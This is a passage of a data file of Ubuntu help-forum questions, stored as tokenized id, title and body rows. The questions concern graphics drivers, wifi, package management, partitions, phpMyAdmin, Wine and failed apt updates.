339829	gameplay/opengl performance issues with amd apu	i recently built a new desktop with an amd a10-6800k ( radeon hd 8670d ) apu . basic graphics performance was fine with the open source drivers , but i installed fglrx* because i wanted to enable sound through the hdmi port . it works like a charm for playing videos ( no problem with fullscreen 1080p ) , but today i decided to try playing supertuxkart for the first time on this machine . the result was very poor - the sound was choppy , the video lagged , and even moving the mouse around on the setting screen was jumpy . oddly enough , my system monitor was not showing particularly high cpu or ram usage at the time . if anyone has any suggestions on sorting out the gameplay issues , i 'd appreciate it . the only things i can think of are trying out the open source drivers ( which cuts off the sound output to my tv ) or the beta driver from amd , but maybe there is some other configuration i can try . *i installed the ( non-beta ) drivers from the amd website since both fglrx and fglrx-updates in the ubuntu repos were showing an `` unsupported hardware '' watermark , but this did n't come up with the one from amd . i 've also enabled hardware acceleration . other info : even running glxgears causes trouble . it 's fine in the small window ( and even returns over 1500 fps ) but enlarging the window causes the framerate to drop ( to a still-respectable 200 fps ) but the playback becomes choppy and again , the mouse cursor no longer moves smoothly . it seems like this is probably an overall opengl issue . update : using the fglrx-updates package from the ubuntu repositories gives much better performance , but leaves me with an `` unsupported hardware '' watermark . the open source radeon drivers work ok for video and display management , but leave games like supertuxkart unplayable .
339831	can not connect to wifi broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 )	i just installed ubuntu 13.04 with my pavilion dv6 . my laptop originally was operated under windows 7 . my wifi worked fine when it was still on windows 7 . however , after i changed the os to linux using ubuntu 13.04 , the wifi stopped working anymore . i can see the network list . i can also use wired network , and it is fine . i just can not connect to my router even with the correct password . technical : 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 06 ) 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) 03:00.1 sd host controller : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 )
339832	aptitude or something else ?	i 'm pretty new to ubuntu and linux in general . i 've also already managed to bork a few installs . anyways , my question is whether i should stick with a package manager like aptitude or is there something better ? i checked out debfoster thinking it was the best thing in the world , and then i went to aptitude once i figured out it was depreciated . though i 'm basically looking for something that is going to keep track of packages i install and they 're dependencies , and uninstall everything in the case that i do n't want that package instead of just keeping the dependencies on my system . any suggestions would be appreciated !
339833	ssd : support for sata 3.1 and `` queued trim ''	i have a relatively new thinkpad 530 running xubuntu 13.04 . i want to swap out the drive with a ssd and am considering the samsung 840 series . there are three models ( pro , non-pro and evo ) . the newest is the evo with sata 3.1 and queued trim support , review here . does the 3.8 kernel ( that i am running ) support `` sata 3.1 '' and `` queued trim '' ? if so , the evo controller seems like a huge win . if not , i 'll fall back to the non-pro drive as - although i 'm using the box as a development workstation - shelling out another $ 100 for the pro does n't seem worth it , and i gather the non-pro 840 works well with gnu/linux .
339837	uninstalling ubuntu 13.04 ?	i have installed ubuntu 13.04 along side with windows xp and then installed kubuntu 13.04 , both installation took place using usb flash drive . i now want to uninstall ubuntu and keep kubuntu along side with windows xp i tried many times to delete the partition which contain ubuntu installation and booting files but i dont know which one is ubuntu and which one is for kubuntu . anyone can help me ! output : /dev/sda1 * 63 81915434 40957686 7 hpfs/ntfs/exfat /dev/sda2 81915496 625137344 271610924+ f w95 ext 'd ( lba ) /dev/sda5 81915498 198774535 58429519 7 hpfs/ntfs/exfat /dev/sda6 286712118 389400476 51344179+ 7 hpfs/ntfs/exfat /dev/sda7 491508738 625137344 66814303+ 7 hpfs/ntfs/exfat /dev/sda8 389400576 487387135 48993280 83 linux /dev/sda9 487389184 491507711 2059264 82 linux swap / solaris /dev/sda10 198774784 286711807 43968512 83 linux
339839	problem after installing phpmyadmin	i installed apache , mysql , and php on my ubuntu 12.04 server but after logging in all i see is a white screen displaying a forward slash . is there something else i need to configure or enable ? / # phpmyadmin default apache configuration alias /phpmyadmin /usr/share/phpmyadmin < directory /usr/share/phpmyadmin > options followsymlinks directoryindex index.php < ifmodule mod_php5.c > addtype application/x-httpd-php .php php_flag magic_quotes_gpc off php_flag track_vars on php_flag register_globals off php_admin_flag allow_url_fopen off php_value include_path . php_admin_value upload_tmp_dir /var/lib/phpmyadmin/tmp php_admin_value open_basedir /usr/share/phpmyadmin/ : /etc/phpmya $ < /ifmodule > < /directory > # authorize for setup < directory /usr/share/phpmyadmin/setup > < ifmodule mod_authn_file.c > authtype basic authname `` phpmyadmin setup '' authuserfile /etc/phpmyadmin/htpasswd.setup < /ifmodule > require valid-user < /directory > # disallow web access to directories that do n't need it < directory /usr/share/phpmyadmin/libraries > order deny , allow deny from all < /directory > < directory /usr/share/phpmyadmin/setup/lib > order deny , allow deny from all < /directory >
339842	xubuntu hotkey for immediate shutdown	i would like to create a two hotkeys . first for terminating all procesess and shutdown the system and turn computer off . i have tried something but it only logged me off and then i had to confirm i want to log off and then turn off computer manually . the second one for simple log off . what is the command i should type in keyboard/hotkey settings ? or should i make .sh file and run it ? what command for running the file should i use then ? thank you very much !
339844	driver wireless installed but no internet	i am trying to use my d-link wireless dongle ( dwa-140 ) to connect to my wireless network . after some searching i found out that i needed the rt2870 wireless lan linux driver . the installation of this driver succeeded without any problems and after that i could use my hardware , because : iwconfig lo no wireless extensions . eth0 no wireless extensions . pan0 no wireless extensions . ra0 ralink sta essid : '' '' nickname : '' rt2870sta '' mode : auto frequency=2.412 ghz bit rate=1 mb/s rts thr : off fragment thr : off link quality=10/100 signal level:0 dbm noise level:0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 and when i scanned for the available networks i got : iwlist ra0 scan ra0 scan completed : cell 01 - address : 00:22:3f:91:15:89 protocol:802.11b/g/n essid : '' tackwlan '' mode : managed frequency:2.412 ghz ( channel 1 ) quality:50/100 signal level : -70 dbm noise level : -92 dbm encryption key : on bit rates:54 mb/s ie : unknown : dd0e0050f204104a0001101044000102 after submitting the command sudo iwconfig ra0 essid `` networkname '' key `` networkkey '' i assumed everything should be ok , but i still have access to the internet ( i made sure that the name and key were correct ) . when i open networkmanager , it only shows the wired connections ( which are not available ) . edit : lsusb bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 07d1:3c09 d-link system dwa-140 802.11n adapter [ ralink rt2870 ] bus 001 device 001 : id 1d6b:0001 linux foundation 1.1 root hub lsb_release -d description : ubuntu 8.10
339845	mouse speed faster vertically than horizontally	this only happens when i use the trackpad . when i try to move the cursor vertically ( up and down ) , the cursor moves very fast . when i move it horizontally , it moves at regular speeds . my screen size is 1366x768 . because my screen is 1.77x wider than tall , i went into /usr/share/x11/xorg.conf.d and added two lines : option `` horizresolution '' `` 1 '' option `` vertresolution '' `` 1.77 '' this did nothing . here is the edited section : section `` inputclass '' identifier `` touchpad ignore duplicates '' matchistouchpad `` on '' matchos `` linux '' matchdevicepath `` /dev/input/mouse* '' option `` ignore '' `` on '' option `` horizresolution '' `` 1 '' option `` vertresolution '' `` 1.77 '' endsection
339850	nvidia geforce 210 on 12.04	the problem is that when i install the recomended drivers for the graphic card and next to that i reboot as the system says , the system loads so far and the screen turns off . i 've tried several mothods but the problem persists . is an nvidia geforce 210 on ubuntu 12.04 lts 64 bits .
339853	md5 hash for 12.04.3 versions not listed	the unbuntuhash page only lists hashes up to version 12.04.2 . where can i find the hash for 12.04.3 ?
339860	solidworks on ubuntu 13.04 ?	i am a bioengineering student who works with solidworks and i would like to be able to run it on ubuntu 13.04 . short of having to install windows , what methods are available and which works best ? if i were to use virtualization and install windows on a virtual machine , is there anyway i can optimize graphic performance among other things ? is wine a viable option for high intensity use ? since everyone else in the department uses solidworks , i do n't want to veer off and use unfamiliar software .
339863	after loging to system hdd led does n't stop shine	i noticed the problem first time when the system ( 13.04 ) has crashed after trying to run wow : cataclysm by the wine . when logging to ubuntu , the hdd diode begins to shine and wo n't stop , and system is going terribly slow . i have found that terminating some process like tracker-store solves the problem , but this is a bad solution . i started a little poke in the system and have found that some data stores to /home/username/.xsession-errors when the tracker-store is active , and there are some data like this : ( tracker-miner-fs:22819 ) : tracker-warning ** : could not open directory `` some_directory '' ** ( zeitgeist-datahub:23085 ) : warning ** : zeitgeist-datahub.vala:231 : unable to get name `` org.gnome.zeitgeist.datahub '' on the bus ! i found solution to stop logging into this file , but this did not solve this problem , after that the hdd still works like being formatted or scanned for viruses . is there any solution ?
339864	ca n't install updates , pleas help	hi i can not install updates either from the terminal or from the system settings . and also having trouble installing software too at times . it 's saying things like failed to fetch stuff and e : some index files failed to download . they have been ignored , or old ones used instead . if any of you could help me with this i 'll be very grateful . thanks .
339866	second and third drives	i might be reformatting my windows installation and installing ubuntu . i have a huge number of files that need to go over . i also have d : and e : hard drives to which i can transfer those files . my question is : how will installing ubuntu on my c : drive affect those drives . will those be mountable as well ? will i be able to use them `` out of the box '' as soon as i 'm finished installing ? the file system on the drives is the one that 's not fat32 i ca n't remember what its called -- ntsc ?
339869	login screen stuck as background	every time i log in my screen goes black then when the background pop 's back up its the login screen . i cant do anything about this any help ?
339871	how to make wifi scan on resume ?	when i wake my system from sleep i often have to wait a while for the wifi driver to scan and connect to my network . if i open a terminal window and run `` sudo iwlist scan , '' the network is detected and connected to right away . how can i make iwlist scan run automatically upon resume ? thanks .
339872	kubuntu 13.04 blutooth missing from system settings !	i have a strange problem . i no longer see any bluetooth settings in the kubuntu system settings . i 'm running kubuntu 13.04 x64 , kernel 3.10.9 . my bluetooth device is working . i can see it remotely , and i can test it using various utilities . ( such as from bluez-utils . ) however , there are no longer any bluetooth settings anywhere in the kubuntu system settings ! i have n't removed any bluetooth packages , at least , not knowingly ! i 'm at a complete loss as to how this could happen , where the settings are supposed to be , or what could cause them to disappear in the first place ! the bluetooth adapter is an atheros ar3012 . one thing i 'm confused about is the driver for this device . based on the entries in the kernel , i would have thought that the driver would be the 'hci_uart ' module , however , the driver is really the 'btusb ' module . regardless , as i said , it 's working . i just ca n't control it from within kde , because the settings are simply gone ! please help ! thanks ! : - ) edit : i should add that doing a search for bluetooth in the system settings tool returns nothing , nor does searching in the kde menu !
339873	12.04 changing the keyboard layout	i want to edit my keyboard layouts , because randomly ? my keyboard layout will switch from 'english ( canada ) ' to 'english ' , completely screwing up how i type , and the only way i have found to fix it is to log out out of my session and select 'english ( canada ) ' on the login screen . apparently , i think i 'm supposed to have the `` keyboard layout '' application , but it is nowhere to be found , it seems like it is n't installed on my os , and i have no idea what to install to enable it . thank you !
339874	create a customized ubuntu live usb	have sort of a weird question . i 'd like to create my own custom ubuntu load , install specific software , change the interface and theme , then take that and create a live usb from it . i 'm making it for some people that are not computer smart , so i want to make it non-persistent , so if they mess it up , they can just reboot and have the exact same desktop from which they started . i was thinking maybe there is a way to convert a virtualbox ubuntu , or something like that . i 'm not the best at the terminal , and i 'd like to test it as i go to make sure that everything is working . any ideas ?
339875	i get a notification with an error message , the message is : 'error : brokencount > 0 . how can i fix it ?	it is also telling me that my installed packages have unmet dependencies . i do not know what does it mean . i 'm a new user for this os . i have a acer c7 chromebook . 3 days ago i installed ubuntu 12.04 lts to my laptop .
339877	added a software source broke my package managers	i tried adding deb ubuntu.mirror.cambrium.nl/ubuntu lucid main to the source list via the software sources gui in ubuntu to get firstclass running . now all my package managers are crashing as well as the software sources dialog . synaptic says e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . go to the repository dialog to correct the problem . e : _cache- > open ( ) failed , please report . w : ignoring file 'lightzone.listsudo ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension .
339881	deleting a partition on usb stick	from disks i am trying to delete a partition from my usb stick . i am getting this error : error deleting partition /dev/sdc1 : command-line `parted -- script `` /dev/sdc '' `` rm 1 '' ' exited with non-zero exit status 1 : error : invalid partition table - recursive partition on /dev/sdc . ( udisks-error-quark , 0 ) trying to format gives this error instead : error synchronizing after initial wipe : timed out waiting for object ( udisks-error-quark , 0 ) how do i get rid of this partition so i can put a plain fat32 one instead ?
339892	can not ping to my router even though wifi is working	i recently installed ubuntu 12.04 . i have been unable to ping to my default local gateway , much less connect to the internet since my installation . below is my output to ifconfig : output of ifconfig : eth0 link encap : ethernet hwaddr 00:26 : b9 : e2:3d:20 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:20 memory : e9600000-e9620000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1362 errors:0 dropped:0 overruns:0 frame:0 tx packets:1362 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:142670 ( 142.6 kb ) tx bytes:142670 ( 142.6 kb ) wlan0 link encap : ethernet hwaddr 00:27:10:0c:9b:50 inet addr:192.168.1.103 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :227:10ff : fe0c:9b50/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:463 errors:0 dropped:0 overruns:0 frame:0 tx packets:1234 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:146587 ( 146.5 kb ) tx bytes:86383 ( 86.3 kb below is my output to /etc/network/interfaces /etc/network/interfaces : auto lo iface lo inet loopback below is my output to cat /etc/resolv.conf nameserver 75.75.75.75 nameserver 75.75.76.76 search hsd1.il.comcast.net below is the contents of /etc/networkmanager/networkmanager.conf : [ main ] plugins=ifupdown , keyfile [ ifupdown ] managed=false below is my output to : nmcli dev list iface wlan0 | grep ip4 : ip4.address [ 1 ] : ip = 192.168.1.103/24 , gw = 192.168.1.1 ip4.dns [ 1 ] : 75.75.75.75 ip4.dns [ 2 ] : 75.75.76.76 ip4.domain [ 1 ] : hsd1.il.comcast.net . output of route -n : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan0 i have verified that /etc/resolv.conf is properly symlinked to /run/resolvconf/resolv.conf when i ping to my local gateway , the result is this : ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . from 192.168.1.103 icmp_seq=1 destination host unreachable i can ping to localhost , 127.0.0.1 , and 192.168.1.103 ( my ip address ) just fine .
339894	apple keyboard / trackpad using too much power ?	if i open powertop my keyboard / trackpad seems to be using 10+ watts of power at 100 % usage at all times . i feel like this may be a bit excessive . is it normal for the keyboard / trackpad on my hardware ( macbook pro 8,2 ) to be using so much power or am i just being silly here ? thanks 10.3 w 100.0 % device usb device : apple internal keyboard / trackpad ( apple inc . )
339895	midi input to finale on wine	i am using finale 2012 with wine on ubuntu 13.04 and i am trying to connect my keyboard through a yamaha ux16 midi to usb cable to my computer so i can use it with finale . when i list the usb devices in the terminal , it picks it up , but finale wont see it . is there some sort of driver i 'm supposed to install ?
339900	ubuntu 13.04 amd64 installation problem on hp desktop	i tried to install ubuntu 13.04 on an hp desktop machine . i made a partion of 20 gb in wndows 8 and created a installation usb and installed it . after that when i reboot i could n't get to grub . so i boot into usb and did the recomended boot repair . it said 'efi detected ' and i clicked yes on all of it . i also got this link http : //paste.ubuntu.com/6049761/ and message . the message was to disable secure boot . so i disabled secure boot and did n't turn on legacy boot ( am i suppose to do that ) . now i can not boot to windows 8 what do i do ? please help . please , please , please .
339903	trying to mount backup of /dev/sda as ext4 for recovery , fdisk reports invalid partition table	i used dd if=/dev/sda of=~/backup.img where /dev/sda was an ext4 filesystem . i want to perform recovery on it which means i need to mount it as ext4 filesystem using extundelete application . can anyone help me mount this properly ? output from dumpe2fs -h : dumpe2fs 1.42.5 ( 29-jul-2012 ) filesystem volume name : doroot last mounted on : / filesystem uuid : 6c4f1456-a5bb-4d1d-afd4-a13d0a1ce63d filesystem magic number : 0xef53 filesystem revision # : 1 ( dynamic ) filesystem features : has_journal ext_attr resize_inode dir_index filetype needs_recovery extent flex_bg sparse_super large_file huge_file uninit_bg dir_nlink extra_isize filesystem flags : signed_directory_hash default mount options : ( none ) filesystem state : clean errors behavior : continue filesystem os type : linux inode count : 1310720 block count : 5242880 reserved block count : 262144 free blocks : 4116242 free inodes : 1127629 first block : 0 block size : 4096 fragment size : 4096 reserved gdt blocks : 1022 blocks per group : 32768 fragments per group : 32768 inodes per group : 8192 inode blocks per group : 512 flex block group size : 16 filesystem created : thu may 3 16:58:15 2012 last mount time : sat jul 13 10:24:27 2013 last write time : thu mar 28 12:54:31 2013 mount count : 2 maximum mount count : 29 last checked : thu mar 28 12:54:31 2013 check interval : 15552000 ( 6 months ) next check after : tue sep 24 12:54:31 2013 lifetime writes : 724 mb reserved blocks uid : 0 ( user root ) reserved blocks gid : 0 ( group root ) first inode : 11 inode size : 256 required extra isize : 28 desired extra isize : 28 journal inode : 8 default directory hash : half_md4 directory hash seed : 9eb0125c-e592-492e-87ad-aaf42f92061d journal backup : inode blocks journal features : journal_incompat_revoke journal size : 128m journal length : 32768 journal sequence : 0x0006800e journal start : 23393 output from fdisk -lu : disk ssdback : 21.5 gb , 21474836480 bytes 255 heads , 63 sectors/track , 2610 cylinders , total 41943040 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk ssdback does n't contain a valid partition table output from df : filesystem size used avail use % mounted on /dev/sda 20g 3.4g 16g 18 % / udev 242m 8.0k 242m 1 % /dev tmpfs 99m 208k 99m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 246m 0 246m 0 % /run/shm output from blkid /dev/sda : /dev/sda : label= '' doroot '' uuid= '' 6c4f1456-a5bb-4d1d-afd4-a13d0a1ce63d '' type= '' ext4 ''
339905	downgrading rhythmbox 2.99 to 2.97 without losing playlists	i installed rhythmbox 2.99 on ubuntu 12.10 following the instructions here and here . this version of rhythmbox seems to be a little buggy and i would like to downgrade to 2.97 , but i want to do this without losing my personal settings ( playlists ) . how can i do this ? i should also point out that when i open the ubuntu software center and i search rhythmbox , it shows as installed ( green checkmark ) , but the version in the ubuntu software center is 2.97 . i 'm not sure if this means that i have both versions installed . when i open rhythmbox , it opens 2.99 and that 's the only version that appears when i search in the dash . i appreciate the help .
339911	eve online + wine 1.6 ( u 13.04 ) : offline mode	i 've freshly installed eve online , build 590158 . after installation , when launched , the launcher says - `` offline mode '' , could n't connect , etc . etc . what 's wrong ? this is the wine console log : $ env wineprefix= '' /home/ondra/.wine '' wine c : \\sw\\hry\\eveonline\\eve.exe fixme : service : scmdatabase_autostart_services auto-start service l '' pnkbstra '' failed to start : 2 fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : gameux : gameexplorerimpl_verifyaccess ( 0x134c50 , l '' c : \\sw\\hry\\eveonline\\eve.exe '' , 0x33fd88 ) fixme : actctx : parse_depend_manifests could not find dependent assembly l '' microsoft.windows.common-controls '' ( 6.0.0.0 ) ondra @ lenovo : ~ $ fixme : actctx : parse_depend_manifests could not find dependent assembly l '' microsoft.windows.common-controls '' ( 6.0.0.0 ) 06:07:41 : debug : src/helpers.cpp ( 140 ) : 'createactctx ' failed with error 0x00000103 ( no more data available. ) . fixme : iphlpapi : notifyaddrchange ( handle 0x33d64c , overlapped 0x438a8d0 ) : stub fixme : winsock : wsalookupservicebeginw ( 0x33d6ac 0x00000ff0 0x33d69c ) stub ! [ 0901/060741 : error : network_change_notifier_win.cc ( 111 ) ] wsalookupservicebegin failed with : 8 fixme : toolhelp : createtoolhelp32snapshot unimplemented : heap list snapshot fixme : toolhelp : heap32listfirst : stub fixme : ntdll : ntlockfile i/o completion on lock not implemented yet fixme : ole : ndrcorrelationinitialize ( 0x703e29c , 0x703de9c , 1024 , 0x0 ) : stub fixme : ole : ndrcorrelationinitialize ( 0x703e26c , 0x703de6c , 1024 , 0x0 ) : stub fixme : ole : ndrcorrelationinitialize ( 0x703e27c , 0x703de7c , 1024 , 0x0 ) : stub fixme : ole : ndrcorrelationinitialize ( 0x703e23c , 0x703de3c , 1024 , 0x0 ) : stub fixme : ole : ndrcorrelationinitialize ( 0x703e27c , 0x703de7c , 1024 , 0x0 ) : stub fixme : ole : ndrcorrelationinitialize ( 0x703e23c , 0x703de3c , 1024 , 0x0 ) : stub
339912	any ide 's in ubuntu for windows development with c sharp ?	i 'm wondering if you folks could steer me toward some window 's dev ide tools for asp.net and or c sharp ? is there a good site for finding ide 's for ubuntu ? i 've not totally installed yet , just looked at it and have been impressed running of dvd in my dvd drive .
339915	could n't find package phablet-tools	i am trying to install ubuntu touch on my galaxy nexus from 32-bit ubuntu 10.04 lts ( not sure if that may be a possible reason ) and after adding the repository i seem to get stuck installing the actual packages : $ sudo apt-get install phablet-tools android-tools-adb android-tools-fastboot reading package lists ... done building dependency tree reading state information ... done e : could n't find package phablet-tools i poked around a little on google and on here trying to find a solution , it seemed like the idea of an apt-get upgrade worked for somebody else but it has failed for me ( forum post can be found here . any help on this would be much appreciated .
339919	how can i install the package iftop ?	i installed ubuntu 12.04 and it 's not updating when i try . i changed may server address for ubuntu and dns but it 's still not working . i 'm trying to install iotop but it does n't . i have already changed my ubuntu server location and changed dns to google 's default server . i have already installed zental correctly , but iotop does n't appear , how can i install it ? here the error log : root @ ubuntu : ~ # sudo apt-get update ign http : //archive.zentyal.org 3.0 inrelease err http : //archive.zentyal.org 3.0 release.gpg unable to connect to archive.zentyal.org : http : ign http : //archive.zentyal.org 3.0 release ign http : //archive.zentyal.org 3.0/extra translationindex ign http : //archive.zentyal.org 3.0/main translationindex err http : //archive.zentyal.org 3.0/main i386 packages unable to connect to archive.zentyal.org : http : err http : //archive.zentyal.org 3.0/extra i386 packages unable to connect to archive.zentyal.org : http : err http : //archive.zentyal.org 3.0/extra translation-en_us unable to connect to archive.zentyal.org : http : err http : //archive.zentyal.org 3.0/extra translation-en unable to connect to archive.zentyal.org : http : err http : //archive.zentyal.org 3.0/main translation-en_us unable to connect to archive.zentyal.org : http : err http : //archive.zentyal.org 3.0/main translation-en unable to connect to archive.zentyal.org : http : ign http : //ppa.launchpad.net precise inrelease err http : //ppa.launchpad.net precise release.gpg unable to connect to ppa.launchpad.net : http : ign http : //ppa.launchpad.net precise release ign http : //ppa.launchpad.net precise/main translationindex err http : //ppa.launchpad.net precise/main sources unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net precise/main i386 packages unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net precise/main translation-en_us unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net precise/main translation-en unable to connect to ppa.launchpad.net : http : ign http : //archive.canonical.com precise inrelease err http : //archive.canonical.com precise release.gpg unable to connect to archive.canonical.com : http : [ ip : 91.189.92.191 80 ] ign http : //archive.canonical.com precise release ign http : //archive.canonical.com precise/partner translationindex err http : //archive.canonical.com precise/partner sources unable to connect to archive.canonical.com : http : [ ip : 91.189.92.191 80 ] err http : //archive.canonical.com precise/partner i386 packages unable to connect to archive.canonical.com : http : [ ip : 91.189.92.191 80 ] err http : //archive.canonical.com precise/partner translation-en_us unable to connect to archive.canonical.com : http : [ ip : 91.189.92.191 80 ] err http : //archive.canonical.com precise/partner translation-en unable to connect to archive.canonical.com : http : [ ip : 91.189.92.191 80 ] ign http : //us.archive.ubuntu.com precise inrelease ign http : //us.archive.ubuntu.com precise-updates inrelease ign http : //us.archive.ubuntu.com precise-backports inrelease err http : //us.archive.ubuntu.com precise release.gpg unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-updates release.gpg unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-backports release.gpg unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] ign http : //us.archive.ubuntu.com precise release ign http : //us.archive.ubuntu.com precise-updates release ign http : //us.archive.ubuntu.com precise-backports release ign http : //us.archive.ubuntu.com precise/main translationindex ign http : //us.archive.ubuntu.com precise/multiverse translationindex ign http : //us.archive.ubuntu.com precise/universe translationindex ign http : //us.archive.ubuntu.com precise-updates/main translationindex ign http : //us.archive.ubuntu.com precise-updates/multiverse translationindex ign http : //us.archive.ubuntu.com precise-updates/universe translationindex ign http : //us.archive.ubuntu.com precise-backports/main translationindex ign http : //us.archive.ubuntu.com precise-backports/multiverse translationindex ign http : //us.archive.ubuntu.com precise-backports/universe translationindex err http : //us.archive.ubuntu.com precise/main sources unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise/universe sources unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise/multiverse sources unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise/main i386 packages unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise/universe i386 packages unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise/multiverse i386 packages unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-updates/main sources unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-updates/universe sources unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-updates/multiverse sources unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-updates/main i386 packages unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-updates/universe i386 packages unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-updates/multiverse i386 packages unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-backports/main sources unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-backports/universe sources unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-backports/multiverse sources unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-backports/main i386 packages unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-backports/universe i386 packages unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-backports/multiverse i386 packages unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise/main translation-en_us unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise/main translation-en unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise/multiverse translation-en_us unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise/multiverse translation-en unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise/universe translation-en_us unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise/universe translation-en unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-updates/main translation-en_us unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-updates/main translation-en unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-updates/multiverse translation-en_us unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-updates/multiverse translation-en unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-updates/universe translation-en_us unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-updates/universe translation-en unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-backports/main translation-en_us unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-backports/main translation-en unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-backports/multiverse translation-en_us unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-backports/multiverse translation-en unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-backports/universe translation-en_us unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com precise-backports/universe translation-en unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.13 80 ] 23 % [ connecting to security.ubuntu.com ( 91.189.91.14 ) ] [ connecting to archive.ubuntu.com ( 91.189.92.202 ) ] ping : root @ ubuntu : ~ # ping -c4 google.com ping google.com ( 202.166.193.187 ) 56 ( 84 ) bytes of 